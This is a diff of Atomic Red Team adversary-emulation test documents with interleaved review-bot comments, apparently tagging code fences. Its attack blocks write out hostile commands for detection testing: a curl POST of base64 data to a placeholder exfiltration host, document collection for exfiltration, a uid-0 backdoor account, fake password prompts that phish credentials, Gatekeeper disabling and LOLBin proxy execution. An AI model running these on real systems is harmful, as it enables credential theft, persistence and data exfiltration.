```cmd
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
#### Dependencies: Run with `powershell`!
##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{dll_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
```
+56 -32
View File
@@ -41,7 +41,9 @@ Executes the CheckIfInstallable class constructor runner instead of executing In
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -69,7 +71,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -78,14 +80,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -112,7 +115,9 @@ Executes the InstallHelper class constructor runner instead of executing Install
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -142,7 +147,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -151,14 +156,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -185,7 +191,9 @@ Executes the installer assembly class constructor.
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -215,7 +223,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -224,14 +232,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -258,7 +267,9 @@ Executes the Install Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -288,7 +299,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -297,14 +308,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -331,7 +343,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -361,7 +375,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -370,14 +384,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -404,7 +419,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -434,7 +451,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -443,14 +460,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -477,7 +495,9 @@ Executes the Uninstall Method
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -507,7 +527,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
$InstallerAssemblyDir = "#{assembly_dir}"
$InstallerAssemblyFileName = "#{assembly_filename}"
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
@@ -516,14 +536,15 @@ Remove-Item -Path $InstallerAssemblyFullPath
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
@@ -547,7 +568,9 @@ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstan
#### Attack Commands: Run with `powershell`!
```
```powershell
# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
. #{test_harness}
@@ -583,7 +606,7 @@ Actual: $ActualOutput
```
#### Cleanup Commands:
```
```powershell
Remove-Item -Path "$Env:windir\System32\Tasks\readme.txt"
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallLog"
Remove-Item -Path "$Env:windir\System32\Tasks\readme.InstallState"
@@ -591,14 +614,15 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe"
```
#### Dependencies: Run with `powershell`!
##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
##### Check Prereq Commands:
```
```powershell
if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1118/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
```
+14 -6
View File
@@ -25,7 +25,9 @@ Automated Collection
#### Attack Commands: Run with `command_prompt`!
```
```cmd
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
```
@@ -46,7 +48,9 @@ Automated Collection
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
@@ -66,14 +70,16 @@ collect information for exfiltration
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-Service > $env:TEMP\T1119_1.txt
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt
```
#### Cleanup Commands:
```
```powershell
Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
@@ -94,7 +100,9 @@ collect information for exfiltration
#### Attack Commands: Run with `command_prompt`!
```
```cmd
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
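Review bot: `sc query type=service` in the context line is not accepted by sc.exe, which requires a space after the equals sign (`sc query type= service`); the source test could be corrected while this file is being regenerated.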
@@ -102,7 +110,7 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
```
#### Cleanup Commands:
```
```cmd
del %TEMP%\T1119_1.txt >nul 2>&1
del %TEMP%\T1119_2.txt >nul 2>&1
del %TEMP%\T1119_3.txt >nul 2>&1
+10 -6
View File
@@ -27,25 +27,27 @@ Executes the Uninstall Method, No Admin Rights Required
#### Attack Commands: Run with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
```
#### Cleanup Commands:
```
```cmd
del #{output_file} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
```
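Review bot: the fence under `#### Attack Commands: Run with `command_prompt`!` at the top of this hunk is still untagged while the cleanup fence directly below it was changed to `cmd`; every other command_prompt Attack Commands block in this change got the `cmd` tag, so this looks like an incomplete regeneration of T1121.md, and the csc.exe/regasm.exe block should be tagged `cmd` as well.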
@@ -69,6 +71,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$key = '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'
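Review bot: the fence after `#### Attack Commands: Run with `powershell`! Elevation Required` stays untagged in this hunk, whereas every other powershell Attack Commands block in this change is tagged `powershell`; the `$key = ...` block should get the `powershell` tag too, otherwise the file ends up half converted.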
@@ -79,7 +82,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
```
#### Cleanup Commands:
```
```powershell
Remove-Item #{output_file} -ErrorAction Ignore | Out-Null
$parentpath = Split-Path -Path "#{output_file}"
Remove-Item $parentpath\key.snk -ErrorAction Ignore | Out-Null
@@ -87,14 +90,15 @@ Remove-Item $parentpath\T1121.tlb -ErrorAction Ignore | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{source_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1121/src/T1121.cs" -OutFile "#{source_file}"
```
+3 -1
View File
@@ -19,7 +19,9 @@ Malware or scripts may be used to interact with the devices through an available
#### Attack Commands: Run with `powershell`!
```
```powershell
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
+6 -2
View File
@@ -26,7 +26,9 @@ Identify the system time
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net time \\#{computer_name}
w32tm /tz
```
@@ -47,7 +49,9 @@ Identify the system time via PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Get-Date
```
+9 -3
View File
@@ -28,7 +28,9 @@ Add a Network Share utilizing the command_prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
```
@@ -54,7 +56,9 @@ Removes a Network Share utilizing the command_prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net share #{share_name} /delete
```
@@ -79,7 +83,9 @@ Removes a Network Share utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
```
+6 -3
View File
@@ -54,20 +54,23 @@ Executes the code in a project file using. C# Example
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown)
```
#### Dependencies: Run with `powershell`!
##### Description: Project file must exist on disk at specified location (#(unknown))
##### Check Prereq Commands:
```
```powershell
if (Test-Path #(unknown)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/T1127.csproj" -OutFile "#(unknown)"
```
+3 -1
View File
@@ -26,7 +26,9 @@ Netsh interacts with other operating system components using dynamic-link librar
#### Attack Commands: Run with `command_prompt`!
```
```cmd
netsh.exe add helper #{helper_file}
```
+3 -1
View File
@@ -31,7 +31,9 @@ Creates a root CA with openssl
#### Attack Commands: Run with `sh`!
```
```sh
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
+3 -1
View File
@@ -23,7 +23,9 @@ Utilizing a common technique for posting base64 encoded data.
#### Attack Commands: Run with `sh`!
```
```sh
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
```
+3 -1
View File
@@ -37,7 +37,9 @@ Requires Administrator Privileges To Execute Test
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
#list processes by user,
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
+12 -4
View File
@@ -44,7 +44,9 @@ Network Share Discovery
#### Attack Commands: Run with `sh`!
```
```sh
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
@@ -71,7 +73,9 @@ Network Share Discovery utilizing the command prompt
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net view \\#{computer_name}
```
@@ -96,7 +100,9 @@ Network Share Discovery utilizing PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
net view \\#{computer_name}
get-smbshare -Name #{computer_name}
```
@@ -116,7 +122,9 @@ View information about all of the resources that are shared on the local compute
#### Attack Commands: Run with `command_prompt`!
```
```cmd
net share
```
+20 -10
View File
@@ -41,12 +41,14 @@ Create a user via useradd
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
useradd -M -N -r -s /bin/bash -c evil_account #{username}
```
#### Cleanup Commands:
```
```bash
userdel #{username}
```
@@ -71,7 +73,9 @@ Creates a user on a MacOS system with dscl
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
@@ -81,7 +85,7 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
#### Cleanup Commands:
```
```bash
dscl . -delete /Users/#{username}
```
@@ -106,12 +110,14 @@ Creates a new user in a command prompt
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
net user /add "#{username}" "#{password}"
```
#### Cleanup Commands:
```
```cmd
net user /del "#{username}"
```
@@ -135,12 +141,14 @@ Creates a new user in PowerShell
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-LocalUser -Name "#{username}" -NoPassword
```
#### Cleanup Commands:
```
```powershell
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
```
@@ -165,13 +173,15 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```
```bash
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
#### Cleanup Commands:
```
```bash
userdel #{username}
```
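Review bot: `passwd --stdin` on the second attack line is a Red Hat/Fedora extension; the shadow-utils `passwd` shipped on Debian and Ubuntu rejects the flag, so the uid 0 account is created but left without the expected password and the test fails for a reason unrelated to the technique. A form that works on both families is `echo "#{username}:#{password}" | chpasswd`. The `bash` tag itself is consistent with the executor; this is only about the command.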
+14 -7
View File
@@ -42,21 +42,24 @@ place to start.
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
```cmd
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
#### Dependencies: Run with `powershell`!
##### Description: Shim database file must exist on disk at specified location (#{file_path})
##### Check Prereq Commands:
```
```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```
```powershell
New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1138/src/AtomicShimx86.sdb" -OutFile "#{file_path}"
```
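Review bot: this file is the case the generated tag has to get right, since the dependency executor (`powershell`) differs from the attack executor (`command_prompt`), and the prereq fences correctly come out as `powershell` while the attack block stays `cmd`. Separately, `Test-Path #{file_path}` and `split-path #{file_path}` in the prereq commands take the path unquoted, so a `file_path` containing a space (anything under `C:\Program Files`) is split into two arguments; quoting them as `Test-Path "#{file_path}"` matches the `-OutFile "#{file_path}"` line that already does.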
@@ -75,13 +78,15 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb
Copy-Item $PathToAtomicsFolder\T1138\bin\T1138CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb
```
#### Cleanup Commands:
```
```powershell
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
```
@@ -101,13 +106,15 @@ https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persist
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -Value "AtomicRedTeamT1138"
```
#### Cleanup Commands:
```
```powershell
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1138" -ErrorAction Ignore
```
+3 -1
View File
@@ -24,7 +24,9 @@ Search through bash history for specifice commands we want to capture
#### Attack Commands: Run with `sh`!
```
```sh
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
+8 -4
View File
@@ -30,13 +30,15 @@ Encode/Decode executable
#### Attack Commands: Run with `command_prompt`!
```
```cmd
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
```
#### Cleanup Commands:
```
```cmd
del %temp%\T1140_calc.txt >nul 2>&1
del %temp%T1140_calc_decoded.exe >nul 2>&1
```
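Review bot: `%temp%T1140_calc_decoded.exe` on the second attack line and in the cleanup is missing the backslash after `%temp%`, so the decoded binary lands beside the Temp directory as `...\AppData\Local\TempT1140_calc_decoded.exe` rather than inside it. The cleanup uses the same string so nothing is left behind, but the encode line uses `%temp%\T1140_calc.txt` correctly; make the decode and delete lines match it.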
@@ -61,13 +63,15 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
#### Attack Commands: Run with `command_prompt`!
```
```cmd
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
```
#### Cleanup Commands:
```
```cmd
del %temp%\tcm.tmp >nul 2>&1
del %temp%\T1140.txt >nul 2>&1
```
+6 -2
View File
@@ -22,7 +22,9 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
#### Attack Commands: Run with `sh`!
```
```sh
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
```
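Review bot: the first two `-e` clauses of the osascript line are identical (`tell app "System Preferences" to activate` twice); one is enough, and dropping the duplicate makes the long line easier to read in the rendered block.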
@@ -44,7 +46,9 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
#### Attack Commands: Run with `powershell`!
```
```powershell
# Creates GUI to prompt for password. Expect long pause before prompt is available.
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
+3 -1
View File
@@ -29,7 +29,9 @@ To manage their credentials, users have to use additional credentials to access
#### Attack Commands: Run with `sh`!
```
```sh
security -h
security find-certificate -a -p > allcerts.pem
security import /tmp/certs.pem -k
+3 -1
View File
@@ -30,7 +30,9 @@ Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell
#### Attack Commands: Run with `powershell`!
```
```powershell
Start-Process #{powershell_command}
```
+3 -1
View File
@@ -26,7 +26,9 @@ Gatekeeper Bypass via command line
#### Attack Commands: Run with `sh`!
```
```sh
sudo xattr -r -d com.apple.quarantine #{app_path}
sudo spctl --master-disable
```
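Review bot: both commands run under `sudo`, yet the header reads "Run with `sh`!" with no "Elevation Required" marker, so the generated flag is missing for this test. More importantly, `sudo spctl --master-disable` turns Gatekeeper off system-wide and it stays off after the test; if this atomic has no cleanup command (none is visible in the hunk), add `sudo spctl --master-enable` as the cleanup so the host is not left with Gatekeeper disabled. The `xattr -r -d com.apple.quarantine` line on its own already demonstrates the quarantine-flag bypass.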

Some files were not shown because too many files have changed in this diff.